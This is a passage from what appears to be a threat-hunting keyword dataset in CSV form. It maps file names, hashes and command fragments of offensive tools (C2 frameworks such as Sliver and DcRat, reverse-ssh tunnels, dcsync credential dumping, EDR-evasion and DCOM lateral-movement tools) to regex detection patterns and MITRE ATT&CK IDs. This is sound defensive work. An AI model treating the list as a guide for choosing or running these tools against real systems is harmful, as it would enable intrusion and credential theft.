TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2LoaderWrapperCLR_x86.dll*",".{0,1000}dbc2LoaderWrapperCLR_x86\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*DBC2-master.zip*",".{0,1000}DBC2\-master\.zip.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*",".{0,1000}dBCSPwd.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*dbd58dba5d92e8d7b6c8dfc6fc54185c33ef8442c61e02f4448bf9641643e596*",".{0,1000}dbd58dba5d92e8d7b6c8dfc6fc54185c33ef8442c61e02f4448bf9641643e596.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*dbf5c14d8ea7fe326f57fbe2b2e140367d7cd6003cbab42bf4bf11de50b52359*",".{0,1000}dbf5c14d8ea7fe326f57fbe2b2e140367d7cd6003cbab42bf4bf11de50b52359.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*dbf75975cedefebfbc67ebc49ea438821e8835a8ea6b4b922e473861cf72edf7*",".{0,1000}dbf75975cedefebfbc67ebc49ea438821e8835a8ea6b4b922e473861cf72edf7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*dbGetNimplant*",".{0,1000}dbGetNimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*dc1baea53709f425ba181705c3f6c37d4840e3e88d71a5e3b39ee40948f12e87*",".{0,1000}dc1baea53709f425ba181705c3f6c37d4840e3e88d71a5e3b39ee40948f12e87.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*dc1bce76ba20f6d3a7020b35f18d47a74597018b0e58a9b1aff6d77be72f4a44*",".{0,1000}dc1bce76ba20f6d3a7020b35f18d47a74597018b0e58a9b1aff6d77be72f4a44.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dc25fef1e036e80dbbf1a5665fa13dc1ed6f8c56875161608cdf532d8a21a4a5*",".{0,1000}dc25fef1e036e80dbbf1a5665fa13dc1ed6f8c56875161608cdf532d8a21a4a5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*dc3c1af9-ea3d-4401-9158-eb6dda735276*",".{0,1000}dc3c1af9\-ea3d\-4401\-9158\-eb6dda735276.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9*",".{0,1000}dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*dc5d95d4ce6cee631b546e1bbfa9f090f66e4167edd5dd828f567c7fc30978dc*",".{0,1000}dc5d95d4ce6cee631b546e1bbfa9f090f66e4167edd5dd828f567c7fc30978dc.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*DC6187CB-D5DF-4973-84A2-F92AAE90CDA9*",".{0,1000}DC6187CB\-D5DF\-4973\-84A2\-F92AAE90CDA9.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","0","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*DC6187CB-D5DF-4973-84A2-F92AAE90CDA9*",".{0,1000}DC6187CB\-D5DF\-4973\-84A2\-F92AAE90CDA9.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","0","N/A","10","5","448","59","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z" "*dc713dd00f6dd0dbf2edb9ec5db8749e996a665356e8c6d595b6558b8864b06a*",".{0,1000}dc713dd00f6dd0dbf2edb9ec5db8749e996a665356e8c6d595b6558b8864b06a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*dc86081b57b7809bfd3df4c8ed664ca0a786a239bdb522ea129f66571f4fd992*",".{0,1000}dc86081b57b7809bfd3df4c8ed664ca0a786a239bdb522ea129f66571f4fd992.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*dc8ee760f0a1fb1a2f2a239cae71f44382a9be2b67736d590a471eae8c81d0af*",".{0,1000}dc8ee760f0a1fb1a2f2a239cae71f44382a9be2b67736d590a471eae8c81d0af.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dc9eb5bb3d882cb0ee30fd21ecbbb030e4e0367dff16b06109bfcfc40fef112*",".{0,1000}dc9eb5bb3d882cb0ee30fd21ecbbb030e4e0367dff16b06109bfcfc40fef112.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*dcbc47feceabeaecb5941fd36b3ca000a18ebb5431cb0d415c44e1235140dc2c*",".{0,1000}dcbc47feceabeaecb5941fd36b3ca000a18ebb5431cb0d415c44e1235140dc2c.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*DCCDA4991BEBC5F2399C47C798981E7828ECC2BA77ED52A1D37BD866AD5582AA*",".{0,1000}DCCDA4991BEBC5F2399C47C798981E7828ECC2BA77ED52A1D37BD866AD5582AA.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*dccon.exe -encrypt2*",".{0,1000}dccon\.exe\s\-encrypt2.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*dcd82c989816c886bbe27741b2bece34a7bf4a1a9a34abfb9b34fe3cf9484201*",".{0,1000}dcd82c989816c886bbe27741b2bece34a7bf4a1a9a34abfb9b34fe3cf9484201.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*dcd89774d490ecfe91a08d0dcfc37065965f31aab2593987839f5afa19625a36*",".{0,1000}dcd89774d490ecfe91a08d0dcfc37065965f31aab2593987839f5afa19625a36.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*dcenum.run*",".{0,1000}dcenum\.run.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*dchrastil*",".{0,1000}dchrastil.{0,1000}","offensive_tool_keyword","Github Username","github user name hosting exploitation tools:hacker. scripting. recon. OSINT. automation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dchrastil","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--dc-ip *--check-user-access*",".{0,1000}\-\-dc\-ip\s.{0,1000}\-\-check\-user\-access.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","371","43","2024-04-23T15:42:03Z","2021-10-06T12:30:16Z" "*dcipher-cli*",".{0,1000}dcipher\-cli.{0,1000}","offensive_tool_keyword","dcipher-cli","Crack hashes using online rainbow & lookup table attack services. right from your terminal.","T1110.001 - T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/k4m4/dcipher-cli","1","0","N/A","N/A","3","226","30","2023-01-05T16:13:56Z","2018-04-08T18:21:44Z" "*dcomexec -*",".{0,1000}dcomexec\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*dcomexec.py*",".{0,1000}dcomexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*dcomhijack.cna*",".{0,1000}dcomhijack\.cna.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*dcomhijack.py*",".{0,1000}dcomhijack\.py.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*dcomhijack-main*",".{0,1000}dcomhijack\-main.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*DCOMPotato.*",".{0,1000}DCOMPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*DCOMPotato-master*",".{0,1000}DCOMPotato\-master.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*DCOMReflection.cpp*",".{0,1000}DCOMReflection\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*DcRat 1.0.7*",".{0,1000}DcRat\s\s1\.0\.7.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*DcRat.7z*",".{0,1000}DcRat\.7z.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*DcRat.exe*",".{0,1000}DcRat\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*DcRat.zip*",".{0,1000}DcRat\.zip.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*DcRat_png.png*",".{0,1000}DcRat_png\.png.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*DcRat-main.zip*",".{0,1000}DcRat\-main\.zip.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*dcrypt_bartpe.zip*",".{0,1000}dcrypt_bartpe\.zip.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*dcrypt_install.iss*",".{0,1000}dcrypt_install\.iss.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*dcrypt_setup_*.exe*",".{0,1000}dcrypt_setup_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*dcrypt_winpe.zip*",".{0,1000}dcrypt_winpe\.zip.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*dcsync -Domain*",".{0,1000}dcsync\s\-Domain.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*dcsync.py*",".{0,1000}dcsync\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*dcsync.py*",".{0,1000}dcsync\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*dcsync@protonmail.com*",".{0,1000}dcsync\@protonmail\.com.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*dcsync_inject*",".{0,1000}dcsync_inject.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*dcsyncattack(*",".{0,1000}dcsyncattack\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*dcsyncattack.py*",".{0,1000}dcsyncattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*dcsyncattack.py*",".{0,1000}dcsyncattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*dcsyncclient.*",".{0,1000}dcsyncclient\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon 